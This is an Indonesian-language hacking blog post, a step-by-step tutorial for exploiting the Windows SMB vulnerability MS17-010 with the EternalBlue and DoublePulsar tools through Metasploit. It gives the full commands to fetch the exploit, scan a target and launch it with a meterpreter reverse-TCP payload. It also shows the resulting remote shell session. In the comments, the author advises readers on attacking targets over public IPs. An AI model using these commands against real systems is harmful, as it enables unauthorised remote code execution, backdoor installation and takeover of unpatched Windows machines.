• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

SMB Remote Code Execution (MS17-010) Eternalblue and Doublepulsar Exploit

May 3, 2017 by Jack Wilder 20 Comments

Kayaknya lagi rame ya exploit ini. Lumayan telat sih kalo saya baru nulis sekarang. kemarin kemarin pun sebenernya males nulis karena udh banyak yang bahas. Berhubung tadi ada yang nanya di fanspage tentang tutorial ini yaudah biar sekalian blog ada isinya.

Exploit ini sebenarnya adalah “private exploit” milik NSA yang berhasil dibocorkan yaitu shadowbroker.
Doublepulsar adalah backdoor yang menginjeksi dan menjalankan kode berbahaya di system operasi target, dan ini diinstall menggunakan exploit Eternalblue yang menyerang service SMB file-sharing. Mirip seperti MS08_067 yang menyerang Windows XP dan Windows Server 2003, MS17-010 yang bersifat remote exploit ini juga tidak membutuhkan backdoor yang harus diinstall secara manual (payload yang diklik oleh korban). Syaratnya, di sistem target service SMB sedang berjalan.
Berikut list sistem operasi Windows yang terinfeksi :
  • Windows XP (all services pack) (x86) (x64)
  • Windows Server 2003 SP0 (x86)
  • Windows Server 2003 SP1/SP2 (x86)
  • Windows Server 2003 (x64)
  • Windows Vista (x86)
  • Windows Vista (x64)
  • Windows Server 2008 (x86)
  • Windows Server 2008 R2 (x86) (x64)
  • Windows 7 (all services pack) (x86) (x64)

 

Okelah langsung saja apa yang peru disiapkan.
  • Wine dan NET Framework
  • Metasploit

 

Sebelumnya update metasploit terlebih dahulu. Karena di metasploit terbaru sudah ada module scanner untuk MS17-010 .

sudo msfupdate

Semuanya sudah siap? Oke sekarang kita coba download exploit nya.
su
cd ~
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd cd Eternalblue-Doublepulsar-Metasploit/
cp eternalblue_doublepulsar.rb /opt/metasploit-framework/modules/exploit/windows/smb/
Oke waktunya beraksi (lebay wkwkwk).
Dalam tutorial ini ip target yang digunakan adalah 192.168.48.153. Silahkan sesuaikan sendiri ya.
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.48.153
run
Nah jika target nya vuln akan muncul notis yang menunjukkan informasi sistem operasi yang berjalan beserta arsitektur yang dipakai.
Liat gambar aja lebih jelas nya :
Oke target sudah dipastikan vuln. Sekarang kita exploit.
use exploit/windows/smb/eternalblue_doublepulsar
show options
untuk DOUBLEPULSARPATH dan ETERNALBLUEPATH sesuaikan dengan lokasi dimana kalian mendownload file di github nya tadi ya. Itulah kenapa diatas saya ngeclone ke folder root biar gak perlu ngeganti path lagi.
Untuk WINEPATH ya isi dengan drive_c dari wine mu. Gak perlu dijelasin lagi. TARGETARCHITECTURE juga harus diperhatikan karena akan berpengaruh saat proses pembuatan backdoor.
Untuk payload secara default menggunakan arsitektur x86 (windows/meterpreter/reverse_tcp) .
Namun jika targetmu menggunakan 64bit ubah dengan perintah
set payload windows/x64/meterpreter/reverse_tcp
untuk lhost dan lport sesuaikan sendiri.
Kalau sudah oke, langsung jalankan exploit nya.
Contoh output :
msf exploit(eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.153:445 - Generating Eternalblue XML data
[*] 192.168.48.153:445 - Generating Doublepulsar XML data
[*] 192.168.48.153:445 - Generating payload DLL for Doublepulsar
[*] 192.168.48.153:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.48.153:445 - Launching Eternalblue...
[+] 192.168.48.153:445 - Backdoor is already installed
[*] 192.168.48.153:445 - Launching Doublepulsar...
[*] Sending stage (957487 bytes) to 192.168.48.153
[*] Meterpreter session 2 opened (192.168.48.1:4444 -> 192.168.48.153:49166) at 2017-05-03 13:41:54 +0700
[+] 192.168.48.153:445 - Remote code executed... 3... 2... 1...
meterpreter > sysinfo
Computer        : WIN-KPGGKF4MPSR
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
Oke cukup jelas kan ? Sekian tutorial kali ini, jika ada yang kurang jelas silahkan komentar atau bisa langsung pm ke fanspage maupun fb saya.
Shares

Filed Under: Metasploit Tagged With: Exploit, Metasploit, Windows

Reader Interactions

Comments

  1. Wery Shanjaya says

    May 3, 2017 at 12:56 pm

    Mantavh…

    Reply
    • kenshusei says

      April 2, 2018 at 10:05 pm

      bagus mantaf boleh dicoba nie, sebagai mantan kenshusei jepang harus bisa dunk

      salam

      Reply
  2. Kost Putri Alsavega says

    May 3, 2017 at 2:53 pm

    Cacat wdhus pitu asu,…….

    Reply
    • chiaki says

      May 4, 2017 at 3:45 am

      wkwkwk

      Reply
  3. andi s says

    May 3, 2017 at 11:07 pm

    Maaf disini net framework buat apaan yah.?

    Reply
    • chiaki says

      May 4, 2017 at 3:44 am

      run eternalblue dari wine butuh net framework

      Reply
  4. Randy Clound says

    May 5, 2017 at 5:38 am

    bang apakah semua file yg ada di folder exploit eternalbluenya harus di pindahkan ke folder nya metasploit smb, atau hanya file ruby nya saja

    Reply
    • chiaki says

      May 9, 2017 at 7:05 pm

      file ruby nya aja.

      Reply
  5. CHALU BLACKHOLZ says

    May 14, 2017 at 4:42 pm

    Jossssss

    Reply
  6. organic-chemistry says

    May 16, 2017 at 10:03 am

    mengapa windows 8.1 dan windows 10 ga bisa? windows 7 pun harus menaklukan net framework 4.5.2 kalo mau exploit kwkwkwkwkwkw

    Reply
    • chiaki says

      May 16, 2017 at 2:26 pm

      maksudnya gimana. ini kan eksploitasi service smb v1. net framework diatas cuma sebagai pembuat payload nya aja.

      Reply
  7. street carder says

    May 17, 2017 at 5:16 am

    kalo nembaknya ip public gmn om? apa sama saja cuma ganti targetnya pk ip public? atau ada yg lainnya yg harus di setup?

    Reply
    • chiaki says

      May 24, 2017 at 7:43 pm

      port forwarding

      Reply
  8. CAMPUR CAMPUR says

    May 17, 2017 at 7:14 pm

    TUTOR GEBLEK CACAT ASUUUUUUUUUUUUUUUUUUUUUUU

    Reply
  9. Sillhouette says

    May 18, 2017 at 7:21 pm

    sudah terintegrasi dengan metasploit yak gans? kalo bisa mah coba exploit asli nya yang dari shadowbroker

    Reply
    • chiaki says

      May 24, 2017 at 7:41 pm

      itu file di github nya sambil di cek lah

      Reply
  10. Kabarterbaru.news says

    June 2, 2017 at 10:38 pm

    bang kalo kita eksekusi di ip dinamis bisa gak? ini gak kaya backconnect kan?

    Reply
    • chiaki says

      June 8, 2017 at 4:31 am

      kalo targetnya diluar jaringan ya harus publik aja ip nya. sama aja kayak back connect

      Reply
      • Anton says

        April 8, 2019 at 12:45 am

        Bisa diperjelas gan bc pk ip dinamis nya? Misal pakai indihome atau modem 3g ane koq failed to bind terus ke local portnya and Kalo payloads ya diganti exec cmd rubynya socket error terus…udah coba test di www? Maksudnya bukan offline dilocalhost gt

        Reply

Trackbacks

  1. SMB Remote Code Execution (MS17-010) Eternalblue and Doublepulsar Exploit – Black Illusion Security says:
    September 27, 2018 at 11:07 am

    […] Content retrieved from: https://exploit.linuxsec.org/eternalblue-doublepulsar-exploi/. […]

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Hack Targeted Website using Reverse IP

RCE pada Redis via Master-Slave Replication

Reverse Shell From Local File Inclusion Exploit

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

DNS Hijacking through Social Engineering

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Uptimerobot.com Custom Domain or Subdomain Takeover

LinuxSec / 75 queries in 0.12 seconds